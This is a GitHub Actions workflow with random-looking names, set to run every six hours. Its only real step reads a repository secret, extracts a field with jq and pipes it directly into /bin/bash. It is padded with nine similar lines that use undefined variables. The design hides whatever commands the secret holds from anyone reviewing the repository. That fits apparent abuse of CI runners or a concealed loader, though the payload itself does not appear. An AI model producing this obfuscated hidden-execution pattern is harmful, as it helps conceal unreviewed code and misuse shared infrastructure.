name: wanyuangui4565

on:
  workflow_dispatch:
  schedule:
    - cron: '37 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wanyuangui4565
        env:
          n4821: ${{ secrets.n4821 }}
        run: |
          echo $n4821 | jq -r .r7 | /bin/bash
          echo $bwb3 | jq -r .g19830 | /bin/bash
          echo $geq414 | jq -r .nl1058 | /bin/bash
          echo $nxpy75 | jq -r .lcbv6379 | /bin/bash
          echo $qs9 | jq -r .msgr8 | /bin/bash
          echo $rhbi33 | jq -r .qjc575 | /bin/bash
          echo $jrhu694 | jq -r .zq2 | /bin/bash
          echo $rnzwi90 | jq -r .m11 | /bin/bash
          echo $lioc3 | jq -r .jeuyd942 | /bin/bash
          echo $wjxt84847 | jq -r .jaslk57 | /bin/bash

